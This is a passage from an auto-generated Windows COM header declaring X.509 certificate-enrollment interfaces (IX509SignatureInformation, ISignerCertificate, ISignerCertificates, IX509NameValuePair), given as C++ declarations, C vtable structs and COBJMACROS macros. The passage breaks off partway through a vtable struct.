#define __IX509SignatureInformation_INTERFACE_DEFINED__

/* interface IX509SignatureInformation */
/* [helpstring][dual][uuid][object] */ 


EXTERN_C const IID IID_IX509SignatureInformation;

#if defined(__cplusplus) && !defined(CINTERFACE)
    
    MIDL_INTERFACE("728ab33c-217d-11da-b2a4-000e7bbb2b09")
    IX509SignatureInformation : public IDispatch
    {
    public:
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_HashAlgorithm( 
            /* [retval][out] */ __RPC__deref_out_opt IObjectId **ppValue) = 0;
        
        virtual /* [propput] */ HRESULT STDMETHODCALLTYPE put_HashAlgorithm( 
            /* [in] */ __RPC__in_opt IObjectId *pValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_PublicKeyAlgorithm( 
            /* [retval][out] */ __RPC__deref_out_opt IObjectId **ppValue) = 0;
        
        virtual /* [propput] */ HRESULT STDMETHODCALLTYPE put_PublicKeyAlgorithm( 
            /* [in] */ __RPC__in_opt IObjectId *pValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_Parameters( 
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue) = 0;
        
        virtual /* [propput] */ HRESULT STDMETHODCALLTYPE put_Parameters( 
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR Value) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_AlternateSignatureAlgorithm( 
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue) = 0;
        
        virtual /* [propput] */ HRESULT STDMETHODCALLTYPE put_AlternateSignatureAlgorithm( 
            /* [in] */ VARIANT_BOOL Value) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_AlternateSignatureAlgorithmSet( 
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_NullSigned( 
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue) = 0;
        
        virtual /* [propput] */ HRESULT STDMETHODCALLTYPE put_NullSigned( 
            /* [in] */ VARIANT_BOOL Value) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE GetSignatureAlgorithm( 
            /* [in] */ VARIANT_BOOL Pkcs7Signature,
            /* [in] */ VARIANT_BOOL SignatureKey,
            /* [retval][out] */ __RPC__deref_out_opt IObjectId **ppValue) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE SetDefaultValues( void) = 0;
        
    };
    
    
#else 	/* C style interface */

    typedef struct IX509SignatureInformationVtbl
    {
        BEGIN_INTERFACE
        
        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
            __RPC__in IX509SignatureInformation * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [annotation][iid_is][out] */ 
            _COM_Outptr_  void **ppvObject);
        
        ULONG ( STDMETHODCALLTYPE *AddRef )( 
            __RPC__in IX509SignatureInformation * This);
        
        ULONG ( STDMETHODCALLTYPE *Release )( 
            __RPC__in IX509SignatureInformation * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )( 
            __RPC__in IX509SignatureInformation * This,
            /* [out] */ __RPC__out UINT *pctinfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )( 
            __RPC__in IX509SignatureInformation * This,
            /* [in] */ UINT iTInfo,
            /* [in] */ LCID lcid,
            /* [out] */ __RPC__deref_out_opt ITypeInfo **ppTInfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )( 
            __RPC__in IX509SignatureInformation * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [size_is][in] */ __RPC__in_ecount_full(cNames) LPOLESTR *rgszNames,
            /* [range][in] */ __RPC__in_range(0,16384) UINT cNames,
            /* [in] */ LCID lcid,
            /* [size_is][out] */ __RPC__out_ecount_full(cNames) DISPID *rgDispId);
        
        /* [local] */ HRESULT ( STDMETHODCALLTYPE *Invoke )( 
            IX509SignatureInformation * This,
            /* [annotation][in] */ 
            _In_  DISPID dispIdMember,
            /* [annotation][in] */ 
            _In_  REFIID riid,
            /* [annotation][in] */ 
            _In_  LCID lcid,
            /* [annotation][in] */ 
            _In_  WORD wFlags,
            /* [annotation][out][in] */ 
            _In_  DISPPARAMS *pDispParams,
            /* [annotation][out] */ 
            _Out_opt_  VARIANT *pVarResult,
            /* [annotation][out] */ 
            _Out_opt_  EXCEPINFO *pExcepInfo,
            /* [annotation][out] */ 
            _Out_opt_  UINT *puArgErr);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_HashAlgorithm )( 
            __RPC__in IX509SignatureInformation * This,
            /* [retval][out] */ __RPC__deref_out_opt IObjectId **ppValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_HashAlgorithm )( 
            __RPC__in IX509SignatureInformation * This,
            /* [in] */ __RPC__in_opt IObjectId *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_PublicKeyAlgorithm )( 
            __RPC__in IX509SignatureInformation * This,
            /* [retval][out] */ __RPC__deref_out_opt IObjectId **ppValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_PublicKeyAlgorithm )( 
            __RPC__in IX509SignatureInformation * This,
            /* [in] */ __RPC__in_opt IObjectId *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Parameters )( 
            __RPC__in IX509SignatureInformation * This,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_Parameters )( 
            __RPC__in IX509SignatureInformation * This,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_AlternateSignatureAlgorithm )( 
            __RPC__in IX509SignatureInformation * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_AlternateSignatureAlgorithm )( 
            __RPC__in IX509SignatureInformation * This,
            /* [in] */ VARIANT_BOOL Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_AlternateSignatureAlgorithmSet )( 
            __RPC__in IX509SignatureInformation * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_NullSigned )( 
            __RPC__in IX509SignatureInformation * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_NullSigned )( 
            __RPC__in IX509SignatureInformation * This,
            /* [in] */ VARIANT_BOOL Value);
        
        HRESULT ( STDMETHODCALLTYPE *GetSignatureAlgorithm )( 
            __RPC__in IX509SignatureInformation * This,
            /* [in] */ VARIANT_BOOL Pkcs7Signature,
            /* [in] */ VARIANT_BOOL SignatureKey,
            /* [retval][out] */ __RPC__deref_out_opt IObjectId **ppValue);
        
        HRESULT ( STDMETHODCALLTYPE *SetDefaultValues )( 
            __RPC__in IX509SignatureInformation * This);
        
        END_INTERFACE
    } IX509SignatureInformationVtbl;

    interface IX509SignatureInformation
    {
        CONST_VTBL struct IX509SignatureInformationVtbl *lpVtbl;
    };

    

#ifdef COBJMACROS


#define IX509SignatureInformation_QueryInterface(This,riid,ppvObject)	\
    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 

#define IX509SignatureInformation_AddRef(This)	\
    ( (This)->lpVtbl -> AddRef(This) ) 

#define IX509SignatureInformation_Release(This)	\
    ( (This)->lpVtbl -> Release(This) ) 


#define IX509SignatureInformation_GetTypeInfoCount(This,pctinfo)	\
    ( (This)->lpVtbl -> GetTypeInfoCount(This,pctinfo) ) 

#define IX509SignatureInformation_GetTypeInfo(This,iTInfo,lcid,ppTInfo)	\
    ( (This)->lpVtbl -> GetTypeInfo(This,iTInfo,lcid,ppTInfo) ) 

#define IX509SignatureInformation_GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId)	\
    ( (This)->lpVtbl -> GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId) ) 

#define IX509SignatureInformation_Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr)	\
    ( (This)->lpVtbl -> Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr) ) 


#define IX509SignatureInformation_get_HashAlgorithm(This,ppValue)	\
    ( (This)->lpVtbl -> get_HashAlgorithm(This,ppValue) ) 

#define IX509SignatureInformation_put_HashAlgorithm(This,pValue)	\
    ( (This)->lpVtbl -> put_HashAlgorithm(This,pValue) ) 

#define IX509SignatureInformation_get_PublicKeyAlgorithm(This,ppValue)	\
    ( (This)->lpVtbl -> get_PublicKeyAlgorithm(This,ppValue) ) 

#define IX509SignatureInformation_put_PublicKeyAlgorithm(This,pValue)	\
    ( (This)->lpVtbl -> put_PublicKeyAlgorithm(This,pValue) ) 

#define IX509SignatureInformation_get_Parameters(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_Parameters(This,Encoding,pValue) ) 

#define IX509SignatureInformation_put_Parameters(This,Encoding,Value)	\
    ( (This)->lpVtbl -> put_Parameters(This,Encoding,Value) ) 

#define IX509SignatureInformation_get_AlternateSignatureAlgorithm(This,pValue)	\
    ( (This)->lpVtbl -> get_AlternateSignatureAlgorithm(This,pValue) ) 

#define IX509SignatureInformation_put_AlternateSignatureAlgorithm(This,Value)	\
    ( (This)->lpVtbl -> put_AlternateSignatureAlgorithm(This,Value) ) 

#define IX509SignatureInformation_get_AlternateSignatureAlgorithmSet(This,pValue)	\
    ( (This)->lpVtbl -> get_AlternateSignatureAlgorithmSet(This,pValue) ) 

#define IX509SignatureInformation_get_NullSigned(This,pValue)	\
    ( (This)->lpVtbl -> get_NullSigned(This,pValue) ) 

#define IX509SignatureInformation_put_NullSigned(This,Value)	\
    ( (This)->lpVtbl -> put_NullSigned(This,Value) ) 

#define IX509SignatureInformation_GetSignatureAlgorithm(This,Pkcs7Signature,SignatureKey,ppValue)	\
    ( (This)->lpVtbl -> GetSignatureAlgorithm(This,Pkcs7Signature,SignatureKey,ppValue) ) 

#define IX509SignatureInformation_SetDefaultValues(This)	\
    ( (This)->lpVtbl -> SetDefaultValues(This) ) 

#endif /* COBJMACROS */


#endif 	/* C style interface */




#endif 	/* __IX509SignatureInformation_INTERFACE_DEFINED__ */


#ifndef __ISignerCertificate_INTERFACE_DEFINED__
#define __ISignerCertificate_INTERFACE_DEFINED__

/* interface ISignerCertificate */
/* [helpstring][dual][uuid][object] */ 


EXTERN_C const IID IID_ISignerCertificate;

#if defined(__cplusplus) && !defined(CINTERFACE)
    
    MIDL_INTERFACE("728ab33d-217d-11da-b2a4-000e7bbb2b09")
    ISignerCertificate : public IDispatch
    {
    public:
        virtual /* [custom] */ HRESULT STDMETHODCALLTYPE Initialize( 
            /* [in] */ VARIANT_BOOL MachineContext,
            /* [in] */ X509PrivateKeyVerify VerifyType,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strCertificate) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_Certificate( 
            /* [in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_PrivateKey( 
            /* [retval][out] */ __RPC__deref_out_opt IX509PrivateKey **ppValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_Silent( 
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue) = 0;
        
        virtual /* [propput] */ HRESULT STDMETHODCALLTYPE put_Silent( 
            /* [in] */ VARIANT_BOOL Value) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_ParentWindow( 
            /* [retval][out] */ __RPC__out LONG *pValue) = 0;
        
        virtual /* [propput] */ HRESULT STDMETHODCALLTYPE put_ParentWindow( 
            /* [in] */ LONG Value) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_UIContextMessage( 
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue) = 0;
        
        virtual /* [propput] */ HRESULT STDMETHODCALLTYPE put_UIContextMessage( 
            /* [in] */ __RPC__in BSTR Value) = 0;
        
        virtual /* [propput] */ HRESULT STDMETHODCALLTYPE put_Pin( 
            /* [in] */ __RPC__in BSTR Value) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_SignatureInformation( 
            /* [retval][out] */ __RPC__deref_out_opt IX509SignatureInformation **ppValue) = 0;
        
    };
    
    
#else 	/* C style interface */

    typedef struct ISignerCertificateVtbl
    {
        BEGIN_INTERFACE
        
        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
            __RPC__in ISignerCertificate * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [annotation][iid_is][out] */ 
            _COM_Outptr_  void **ppvObject);
        
        ULONG ( STDMETHODCALLTYPE *AddRef )( 
            __RPC__in ISignerCertificate * This);
        
        ULONG ( STDMETHODCALLTYPE *Release )( 
            __RPC__in ISignerCertificate * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )( 
            __RPC__in ISignerCertificate * This,
            /* [out] */ __RPC__out UINT *pctinfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )( 
            __RPC__in ISignerCertificate * This,
            /* [in] */ UINT iTInfo,
            /* [in] */ LCID lcid,
            /* [out] */ __RPC__deref_out_opt ITypeInfo **ppTInfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )( 
            __RPC__in ISignerCertificate * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [size_is][in] */ __RPC__in_ecount_full(cNames) LPOLESTR *rgszNames,
            /* [range][in] */ __RPC__in_range(0,16384) UINT cNames,
            /* [in] */ LCID lcid,
            /* [size_is][out] */ __RPC__out_ecount_full(cNames) DISPID *rgDispId);
        
        /* [local] */ HRESULT ( STDMETHODCALLTYPE *Invoke )( 
            ISignerCertificate * This,
            /* [annotation][in] */ 
            _In_  DISPID dispIdMember,
            /* [annotation][in] */ 
            _In_  REFIID riid,
            /* [annotation][in] */ 
            _In_  LCID lcid,
            /* [annotation][in] */ 
            _In_  WORD wFlags,
            /* [annotation][out][in] */ 
            _In_  DISPPARAMS *pDispParams,
            /* [annotation][out] */ 
            _Out_opt_  VARIANT *pVarResult,
            /* [annotation][out] */ 
            _Out_opt_  EXCEPINFO *pExcepInfo,
            /* [annotation][out] */ 
            _Out_opt_  UINT *puArgErr);
        
        /* [custom] */ HRESULT ( STDMETHODCALLTYPE *Initialize )( 
            __RPC__in ISignerCertificate * This,
            /* [in] */ VARIANT_BOOL MachineContext,
            /* [in] */ X509PrivateKeyVerify VerifyType,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strCertificate);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Certificate )( 
            __RPC__in ISignerCertificate * This,
            /* [in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_PrivateKey )( 
            __RPC__in ISignerCertificate * This,
            /* [retval][out] */ __RPC__deref_out_opt IX509PrivateKey **ppValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Silent )( 
            __RPC__in ISignerCertificate * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_Silent )( 
            __RPC__in ISignerCertificate * This,
            /* [in] */ VARIANT_BOOL Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_ParentWindow )( 
            __RPC__in ISignerCertificate * This,
            /* [retval][out] */ __RPC__out LONG *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_ParentWindow )( 
            __RPC__in ISignerCertificate * This,
            /* [in] */ LONG Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_UIContextMessage )( 
            __RPC__in ISignerCertificate * This,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_UIContextMessage )( 
            __RPC__in ISignerCertificate * This,
            /* [in] */ __RPC__in BSTR Value);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_Pin )( 
            __RPC__in ISignerCertificate * This,
            /* [in] */ __RPC__in BSTR Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_SignatureInformation )( 
            __RPC__in ISignerCertificate * This,
            /* [retval][out] */ __RPC__deref_out_opt IX509SignatureInformation **ppValue);
        
        END_INTERFACE
    } ISignerCertificateVtbl;

    interface ISignerCertificate
    {
        CONST_VTBL struct ISignerCertificateVtbl *lpVtbl;
    };

    

#ifdef COBJMACROS


#define ISignerCertificate_QueryInterface(This,riid,ppvObject)	\
    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 

#define ISignerCertificate_AddRef(This)	\
    ( (This)->lpVtbl -> AddRef(This) ) 

#define ISignerCertificate_Release(This)	\
    ( (This)->lpVtbl -> Release(This) ) 


#define ISignerCertificate_GetTypeInfoCount(This,pctinfo)	\
    ( (This)->lpVtbl -> GetTypeInfoCount(This,pctinfo) ) 

#define ISignerCertificate_GetTypeInfo(This,iTInfo,lcid,ppTInfo)	\
    ( (This)->lpVtbl -> GetTypeInfo(This,iTInfo,lcid,ppTInfo) ) 

#define ISignerCertificate_GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId)	\
    ( (This)->lpVtbl -> GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId) ) 

#define ISignerCertificate_Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr)	\
    ( (This)->lpVtbl -> Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr) ) 


#define ISignerCertificate_Initialize(This,MachineContext,VerifyType,Encoding,strCertificate)	\
    ( (This)->lpVtbl -> Initialize(This,MachineContext,VerifyType,Encoding,strCertificate) ) 

#define ISignerCertificate_get_Certificate(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_Certificate(This,Encoding,pValue) ) 

#define ISignerCertificate_get_PrivateKey(This,ppValue)	\
    ( (This)->lpVtbl -> get_PrivateKey(This,ppValue) ) 

#define ISignerCertificate_get_Silent(This,pValue)	\
    ( (This)->lpVtbl -> get_Silent(This,pValue) ) 

#define ISignerCertificate_put_Silent(This,Value)	\
    ( (This)->lpVtbl -> put_Silent(This,Value) ) 

#define ISignerCertificate_get_ParentWindow(This,pValue)	\
    ( (This)->lpVtbl -> get_ParentWindow(This,pValue) ) 

#define ISignerCertificate_put_ParentWindow(This,Value)	\
    ( (This)->lpVtbl -> put_ParentWindow(This,Value) ) 

#define ISignerCertificate_get_UIContextMessage(This,pValue)	\
    ( (This)->lpVtbl -> get_UIContextMessage(This,pValue) ) 

#define ISignerCertificate_put_UIContextMessage(This,Value)	\
    ( (This)->lpVtbl -> put_UIContextMessage(This,Value) ) 

#define ISignerCertificate_put_Pin(This,Value)	\
    ( (This)->lpVtbl -> put_Pin(This,Value) ) 

#define ISignerCertificate_get_SignatureInformation(This,ppValue)	\
    ( (This)->lpVtbl -> get_SignatureInformation(This,ppValue) ) 

#endif /* COBJMACROS */


#endif 	/* C style interface */




#endif 	/* __ISignerCertificate_INTERFACE_DEFINED__ */


#ifndef __ISignerCertificates_INTERFACE_DEFINED__
#define __ISignerCertificates_INTERFACE_DEFINED__

/* interface ISignerCertificates */
/* [helpstring][dual][uuid][object] */ 


EXTERN_C const IID IID_ISignerCertificates;

#if defined(__cplusplus) && !defined(CINTERFACE)
    
    MIDL_INTERFACE("728ab33e-217d-11da-b2a4-000e7bbb2b09")
    ISignerCertificates : public IDispatch
    {
    public:
        virtual /* [helpstring][id][propget][custom] */ HRESULT STDMETHODCALLTYPE get_ItemByIndex( 
            /* [in] */ LONG Index,
            /* [retval][out] */ __RPC__deref_out_opt ISignerCertificate **pVal) = 0;
        
        virtual /* [helpstring][id][propget][custom] */ HRESULT STDMETHODCALLTYPE get_Count( 
            /* [retval][out] */ __RPC__out long *pVal) = 0;
        
        virtual /* [restricted][helpstring][id][propget] */ HRESULT STDMETHODCALLTYPE get__NewEnum( 
            /* [retval][out] */ __RPC__deref_out_opt LPUNKNOWN *pVal) = 0;
        
        virtual /* [helpstring][id][custom] */ HRESULT STDMETHODCALLTYPE Add( 
            /* [in] */ __RPC__in_opt ISignerCertificate *pVal) = 0;
        
        virtual /* [helpstring][id] */ HRESULT STDMETHODCALLTYPE Remove( 
            /* [in] */ LONG Index) = 0;
        
        virtual /* [helpstring][id] */ HRESULT STDMETHODCALLTYPE Clear( void) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE Find( 
            /* [in] */ __RPC__in_opt ISignerCertificate *pSignerCert,
            /* [retval][out] */ __RPC__out LONG *piSignerCert) = 0;
        
    };
    
    
#else 	/* C style interface */

    typedef struct ISignerCertificatesVtbl
    {
        BEGIN_INTERFACE
        
        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
            __RPC__in ISignerCertificates * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [annotation][iid_is][out] */ 
            _COM_Outptr_  void **ppvObject);
        
        ULONG ( STDMETHODCALLTYPE *AddRef )( 
            __RPC__in ISignerCertificates * This);
        
        ULONG ( STDMETHODCALLTYPE *Release )( 
            __RPC__in ISignerCertificates * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )( 
            __RPC__in ISignerCertificates * This,
            /* [out] */ __RPC__out UINT *pctinfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )( 
            __RPC__in ISignerCertificates * This,
            /* [in] */ UINT iTInfo,
            /* [in] */ LCID lcid,
            /* [out] */ __RPC__deref_out_opt ITypeInfo **ppTInfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )( 
            __RPC__in ISignerCertificates * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [size_is][in] */ __RPC__in_ecount_full(cNames) LPOLESTR *rgszNames,
            /* [range][in] */ __RPC__in_range(0,16384) UINT cNames,
            /* [in] */ LCID lcid,
            /* [size_is][out] */ __RPC__out_ecount_full(cNames) DISPID *rgDispId);
        
        /* [local] */ HRESULT ( STDMETHODCALLTYPE *Invoke )( 
            ISignerCertificates * This,
            /* [annotation][in] */ 
            _In_  DISPID dispIdMember,
            /* [annotation][in] */ 
            _In_  REFIID riid,
            /* [annotation][in] */ 
            _In_  LCID lcid,
            /* [annotation][in] */ 
            _In_  WORD wFlags,
            /* [annotation][out][in] */ 
            _In_  DISPPARAMS *pDispParams,
            /* [annotation][out] */ 
            _Out_opt_  VARIANT *pVarResult,
            /* [annotation][out] */ 
            _Out_opt_  EXCEPINFO *pExcepInfo,
            /* [annotation][out] */ 
            _Out_opt_  UINT *puArgErr);
        
        /* [helpstring][id][propget][custom] */ HRESULT ( STDMETHODCALLTYPE *get_ItemByIndex )( 
            __RPC__in ISignerCertificates * This,
            /* [in] */ LONG Index,
            /* [retval][out] */ __RPC__deref_out_opt ISignerCertificate **pVal);
        
        /* [helpstring][id][propget][custom] */ HRESULT ( STDMETHODCALLTYPE *get_Count )( 
            __RPC__in ISignerCertificates * This,
            /* [retval][out] */ __RPC__out long *pVal);
        
        /* [restricted][helpstring][id][propget] */ HRESULT ( STDMETHODCALLTYPE *get__NewEnum )( 
            __RPC__in ISignerCertificates * This,
            /* [retval][out] */ __RPC__deref_out_opt LPUNKNOWN *pVal);
        
        /* [helpstring][id][custom] */ HRESULT ( STDMETHODCALLTYPE *Add )( 
            __RPC__in ISignerCertificates * This,
            /* [in] */ __RPC__in_opt ISignerCertificate *pVal);
        
        /* [helpstring][id] */ HRESULT ( STDMETHODCALLTYPE *Remove )( 
            __RPC__in ISignerCertificates * This,
            /* [in] */ LONG Index);
        
        /* [helpstring][id] */ HRESULT ( STDMETHODCALLTYPE *Clear )( 
            __RPC__in ISignerCertificates * This);
        
        HRESULT ( STDMETHODCALLTYPE *Find )( 
            __RPC__in ISignerCertificates * This,
            /* [in] */ __RPC__in_opt ISignerCertificate *pSignerCert,
            /* [retval][out] */ __RPC__out LONG *piSignerCert);
        
        END_INTERFACE
    } ISignerCertificatesVtbl;

    interface ISignerCertificates
    {
        CONST_VTBL struct ISignerCertificatesVtbl *lpVtbl;
    };

    

#ifdef COBJMACROS


#define ISignerCertificates_QueryInterface(This,riid,ppvObject)	\
    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 

#define ISignerCertificates_AddRef(This)	\
    ( (This)->lpVtbl -> AddRef(This) ) 

#define ISignerCertificates_Release(This)	\
    ( (This)->lpVtbl -> Release(This) ) 


#define ISignerCertificates_GetTypeInfoCount(This,pctinfo)	\
    ( (This)->lpVtbl -> GetTypeInfoCount(This,pctinfo) ) 

#define ISignerCertificates_GetTypeInfo(This,iTInfo,lcid,ppTInfo)	\
    ( (This)->lpVtbl -> GetTypeInfo(This,iTInfo,lcid,ppTInfo) ) 

#define ISignerCertificates_GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId)	\
    ( (This)->lpVtbl -> GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId) ) 

#define ISignerCertificates_Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr)	\
    ( (This)->lpVtbl -> Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr) ) 


#define ISignerCertificates_get_ItemByIndex(This,Index,pVal)	\
    ( (This)->lpVtbl -> get_ItemByIndex(This,Index,pVal) ) 

#define ISignerCertificates_get_Count(This,pVal)	\
    ( (This)->lpVtbl -> get_Count(This,pVal) ) 

#define ISignerCertificates_get__NewEnum(This,pVal)	\
    ( (This)->lpVtbl -> get__NewEnum(This,pVal) ) 

#define ISignerCertificates_Add(This,pVal)	\
    ( (This)->lpVtbl -> Add(This,pVal) ) 

#define ISignerCertificates_Remove(This,Index)	\
    ( (This)->lpVtbl -> Remove(This,Index) ) 

#define ISignerCertificates_Clear(This)	\
    ( (This)->lpVtbl -> Clear(This) ) 

#define ISignerCertificates_Find(This,pSignerCert,piSignerCert)	\
    ( (This)->lpVtbl -> Find(This,pSignerCert,piSignerCert) ) 

#endif /* COBJMACROS */


#endif 	/* C style interface */




#endif 	/* __ISignerCertificates_INTERFACE_DEFINED__ */


#ifndef __IX509NameValuePair_INTERFACE_DEFINED__
#define __IX509NameValuePair_INTERFACE_DEFINED__

/* interface IX509NameValuePair */
/* [helpstring][dual][uuid][object] */ 


EXTERN_C const IID IID_IX509NameValuePair;

#if defined(__cplusplus) && !defined(CINTERFACE)
    
    MIDL_INTERFACE("728ab33f-217d-11da-b2a4-000e7bbb2b09")
    IX509NameValuePair : public IDispatch
    {
    public:
        virtual HRESULT STDMETHODCALLTYPE Initialize( 
            /* [in] */ __RPC__in BSTR strName,
            /* [in] */ __RPC__in BSTR strValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_Value( 
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_Name( 
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue) = 0;
        
    };
    
    
#else 	/* C style interface */

    typedef struct IX509NameValuePairVtbl
    {
        BEGIN_INTERFACE
        
        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
            __RPC__in IX509NameValuePair * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [annotation][iid_is][out] */ 
            _COM_Outptr_  void **ppvObject);
        
        ULONG ( STDMETHODCALLTYPE *AddRef )( 
            __RPC__in IX509NameValuePair * This);
        
        ULONG ( STDMETHODCALLTYPE *Release )( 
            __RPC__in IX509NameValuePair * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )( 
            __RPC__in IX509NameValuePair * This,
            /* [out] */ __RPC__out UINT *pctinfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )( 
            __RPC__in IX509NameValuePair * This,
            /* [in] */ UINT iTInfo,
            /* [in] */ LCID lcid,
            /* [out] */ __RPC__deref_out_opt ITypeInfo **ppTInfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )( 
            __RPC__in IX509NameValuePair * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [size_is][in] */ __RPC__in_ecount_full(cNames) LPOLESTR *rgszNames,
            /* [range][in] */ __RPC__in_range(0,16384) UINT cNames,
            /* [in] */ LCID lcid,
            /* [size_is][out] */ __RPC__out_ecount_full(cNames) DISPID *rgDispId);
        
        /* [local] */ HRESULT ( STDMETHODCALLTYPE *Invoke )( 
            IX509NameValuePair * This,
            /* [annotation][in] */ 
            _In_  DISPID dispIdMember,
            /* [annotation][in] */ 
            _In_  REFIID riid,
            /* [annotation][in] */ 
            _In_  LCID lcid,
            /* [annotation][in] */ 
            _In_  WORD wFlags,
            /* [annotation][out][in] */ 
            _In_  DISPPARAMS *pDispParams,
            /* [annotation][out] */ 
            _Out_opt_  VARIANT *pVarResult,
            /* [annotation][out] */ 
            _Out_opt_  EXCEPINFO *pExcepInfo,
            /* [annotation][out] */ 
            _Out_opt_  UINT *puArgErr);
        
